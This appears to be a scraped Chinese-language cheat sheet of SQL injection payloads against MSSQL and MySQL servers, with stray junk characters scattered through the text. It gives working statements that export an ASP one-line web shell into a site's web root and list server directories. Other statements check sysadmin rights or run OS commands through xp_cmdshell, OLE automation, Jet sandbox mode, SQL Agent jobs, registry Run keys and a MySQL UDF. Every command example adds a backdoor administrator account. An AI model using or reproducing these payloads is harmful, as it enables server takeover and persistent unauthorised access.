MSSQL语句导出一句话木马
. s2 k1 q0 O1 E5 s! h' k2 g) n首先确定网站的WEB路径' E1 [2 E# I* S T v
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 H% R! g C1 C& |8 i: K( G% A4 v/ K) L
* r, f6 L: ^- p' f H! U `$ b& R;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
0 {+ z2 S( y% G5 [' J//将一句话木马插入表中* I) |9 q# [; i8 n4 U' y8 b& M6 {
2 `) p# x! Y, E7 ~) L;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
0 m1 e5 k" w* U1 `! _//导出一个ASP文件
' E+ F' T2 M3 ~5 s8 X% X' P6 \( n3 {
( t. H* j& w- ~/ V/ z# j+ E0 C: u* Z+ y
关于MSSQL列目录
O9 g9 K8 y7 h5 h/ };CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表7 n' e" w( D# p3 D; q' B* L
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表' l h6 j1 {5 O6 A# S
9 Z* R( z$ F; L/ X' \* S
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
& K k+ m8 X% @( p; k6 b7 B; N, K! [. _; m I5 J
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
& w* R* h* X6 R2 R0 r
' I0 X' V' [& Q+ UAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符/ h% E/ ^8 A! V
: d2 {& m+ Y9 _, O- d5 g' U& _( z$ |; i
数据库版本和权限查看
$ u: z/ A8 P1 f# P: kand 1=(select @@VERSION) //查看详细的数据库信息.
2 M* u* ?7 Z0 I( \, i2 aand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
3 P6 P/ r% J& g" Y& mand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER4 z. L0 w/ I8 ?' g* f! J+ w
% i; b# q( K. H* X" ^: y2 c% ~
1.利用xp_cmdshell执行命令
4 v. W" ]' V# a, D* f) oexec master..xp_cmdshell 'net user rfire 123456 /add'7 N* C, X6 v6 r L. ]9 ^
exec master..xp_cmdshell 'net localgroup administrators rfire /add': S! u( N- p6 H4 Q4 [% S5 U2 t
( _- H* [) I! t% r* u1 ]
恢复xp_cmdshell存储过程, {9 i' X. \1 J; w G' l- _8 n- w+ Q
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 b$ g/ r/ o8 g @& U, r
7 X3 w3 b$ I3 f3 m T: s& U7 r0 j0 _$ ?" \
2.利用SP_OAcreate和SP_OAMETHOD执行命令
" ]( J5 w5 _# G3 a9 E( k( ~7 H$ w在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
' u% J6 E3 g' ^0 M, W$ x! l A8 uDECLARE @shell INT //建立一个@shell实体) F* ~+ A9 @4 f2 W2 {6 y! m
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
+ L2 N. {- G- l3 `( k& E( h5 iEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例0 y" t& V+ l+ O5 z& M8 h
' ?: c) z2 I' k
; K% F3 i( O) ]* `$ w1 C+ C" _
3.利用沙盒模式
* q6 u& Y$ w! F; W4 |先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。 w t% ]7 H$ C! t2 t# }
开启沙盒模式:+ M/ T" f- y# A4 W/ p2 e+ c0 A* Z
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
}: _- N9 y* R: ?6 B: ~0 e D) \4 h$ k% ] z6 ~2 n x
执行命令:
- [0 j6 C% q* r1 T+ ]9 [6 Y4 _( h7 mSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');9 u% P1 k( T4 m D9 M
/ q2 F M: D6 r5 H
8 m& {, D( w; f, l# u) ]4.利用SQL代理执行命令4 g4 k, ~! e9 Y j8 ~& V
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
5 E4 m' O; ]3 B. ?+ d$ D4 D5 S2 j- {7 L: s: L
执行命令:, t* Q1 s4 b: |4 ~: f
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错2 O0 A4 ], b, F
exec sp_add_job 'x'
7 M! @+ P u* M, g. ^7 O4 @* i& ^/ sexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
$ H3 o, F# T6 Mexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业& d% X- Q5 j: W8 N; A c/ C3 w; `
% v" P' b( P7 s2 D! o
' @# K3 M: z5 M5 ]) q
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)! ?! ^& t g" `1 \
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'7 c( d( K( J8 Y$ G
/ P! T* _6 q" u7 i& p( f8 Y7 n7 ^& Z6 U; d& F' D( ]# G5 N
6.MYSQL的命令执行4 \- ~3 p. r- }% ]8 n9 w# W& @) {
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
# Q" I. m3 b: I" I6 a8 G6 w首先要在su.php下导出c:\windows\udf.dll y/ H |4 I' o9 m; M
导出后执行创建自定义函数命令: }& u9 J6 H$ ~, r
Create Function cmdshell returns string soname 'udf.dll'" ~0 s, k. C; y4 Z5 G
执行命令3 N+ N+ Y f4 C( z
select cmdshell('net user rfire 123456 /add')
6 ^5 F: x; e3 ]7 E( O ?! o8 Y执行后删除函数 drop function cmdshell" N: X! @4 U) R' P4 u
|